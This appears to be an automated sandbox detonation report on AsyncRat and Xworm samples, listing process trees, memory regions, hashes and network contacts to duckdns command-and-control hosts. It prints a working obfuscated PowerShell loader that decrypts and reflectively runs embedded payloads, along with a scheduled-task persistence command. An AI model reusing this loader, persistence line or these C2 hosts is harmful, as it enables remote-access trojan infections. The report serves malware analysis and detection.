"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Local\Temp\bddddsx"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe'" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\fresh.exe" "C:\Users\Admin\AppData\Local\Temp\bddddsx\bddddsx.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp

Files

memory/2972-0-0x00000000002B0000-0x00000000002DE000-memory.dmp

memory/2972-1-0x0000000074110000-0x00000000747FE000-memory.dmp

memory/2972-2-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/2984-3-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-4-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-6-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-5-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2984-9-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-11-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2984-13-0x0000000000400000-0x0000000000410000-memory.dmp

memory/2972-16-0x0000000074110000-0x00000000747FE000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

148s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 408 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 408 wrote to memory of 1528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 1348 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1528 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3964 wrote to memory of 4204 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 19.40.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
US 8.8.8.8:53 bagdg.duckdns.org udp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp
GB 154.30.255.175:8887 bagdg.duckdns.org tcp

Files

memory/3964-0-0x0000000002AF0000-0x0000000002B26000-memory.dmp

memory/3964-1-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-3-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-2-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-4-0x0000000005660000-0x0000000005C88000-memory.dmp

memory/3964-5-0x0000000005460000-0x0000000005482000-memory.dmp

memory/3964-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5rillfw.try.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3964-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/3964-17-0x0000000005F00000-0x0000000006254000-memory.dmp

memory/3964-18-0x0000000006310000-0x000000000632E000-memory.dmp

memory/3964-19-0x0000000006340000-0x000000000638C000-memory.dmp

memory/3964-20-0x0000000006890000-0x00000000068D4000-memory.dmp

memory/3964-21-0x0000000007420000-0x0000000007496000-memory.dmp

memory/3964-22-0x0000000007D20000-0x000000000839A000-memory.dmp

memory/3964-23-0x00000000076C0000-0x00000000076DA000-memory.dmp

memory/4204-24-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/4204-25-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4204-26-0x0000000005240000-0x0000000005250000-memory.dmp

memory/4204-38-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-39-0x0000000005190000-0x00000000051A4000-memory.dmp

memory/3964-41-0x00000000051B0000-0x00000000051C2000-memory.dmp

memory/3964-40-0x00000000051A0000-0x00000000051AE000-memory.dmp

memory/3964-43-0x0000000075380000-0x0000000075B30000-memory.dmp

memory/3964-44-0x0000000005020000-0x0000000005030000-memory.dmp

memory/3964-45-0x0000000005020000-0x0000000005030000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

127s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

Network

N/A

Files

memory/1456-4-0x000000001B360000-0x000000001B642000-memory.dmp

memory/1456-5-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

memory/1456-6-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-7-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-8-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-9-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-10-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-11-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-12-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-13-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-14-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-15-0x0000000002B00000-0x0000000002B80000-memory.dmp

memory/1456-16-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1456-17-0x0000000002B00000-0x0000000002B80000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

110s

Max time network

187s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3604 created 3500 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE

Xworm

trojan rat xworm

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 3604 wrote to memory of 3440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\payload.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 vbdsg.duckdns.org udp
GB 57.128.155.22:8896 vbdsg.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp

Files

memory/3604-0-0x0000013AFAFE0000-0x0000013AFB002000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4zvze4pc.cwp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3604-10-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-11-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-12-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-13-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-14-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-15-0x0000013AE09C0000-0x0000013AE09D0000-memory.dmp

memory/3604-16-0x0000013A90600000-0x0000013A90654000-memory.dmp

memory/3604-17-0x0000013A906B0000-0x0000013A90704000-memory.dmp

memory/3440-18-0x00000135D0C70000-0x00000135D0C80000-memory.dmp

memory/3440-19-0x00000135D28A0000-0x00000135D28B0000-memory.dmp

memory/3440-20-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3440-21-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3440-22-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3604-25-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3604-26-0x0000013A906B0000-0x0000013A90704000-memory.dmp

memory/3440-27-0x00007FFD13A10000-0x00007FFD144D1000-memory.dmp

memory/3440-28-0x00000135EB320000-0x00000135EB330000-memory.dmp

memory/3440-29-0x00000135EB320000-0x00000135EB330000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

158s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\windows.cmd';$GZdQ='InnxIivnxIionxIikenxIi'.Replace('nxIi', ''),'MafFZUifFZUnMfFZUofFZUdulfFZUefFZU'.Replace('fFZU', ''),'RBxvFeaBxvFdLBxvFiBxvFneBxvFsBxvF'.Replace('BxvF', ''),'CryZmpeatyZmpeDyZmpeyZmpcryZmpypyZmptoyZmpryZmp'.Replace('yZmp', ''),'GeCwGCtCCwGCuCwGCrrCwGCenCwGCtCwGCPrCwGCoceCwGCssCwGC'.Replace('CwGC', ''),'ENPQHntNPQHryNPQHPoNPQHintNPQH'.Replace('NPQH', ''),'SZRwRpliZRwRtZRwR'.Replace('ZRwR', ''),'LoTzLuadTzLu'.Replace('TzLu', ''),'DeczTyPompzTyPreszTyPszTyP'.Replace('zTyP', ''),'CofgggpyfgggTofggg'.Replace('fggg', ''),'TrRwWianRwWisfoRwWirRwWimRwWiFiRwWinaRwWilBRwWiloRwWickRwWi'.Replace('RwWi', ''),'ChxtFnanxtFngextFnExxtFntenxtFnsxtFnioxtFnnxtFn'.Replace('xtFn', ''),'FrowqBNmwqBNBwqBNasewqBN64wqBNStrwqBNinwqBNgwqBN'.Replace('wqBN', ''),'ElMUHUeMUHUmMUHUentMUHUAtMUHU'.Replace('MUHU', '');powershell -w hidden;function 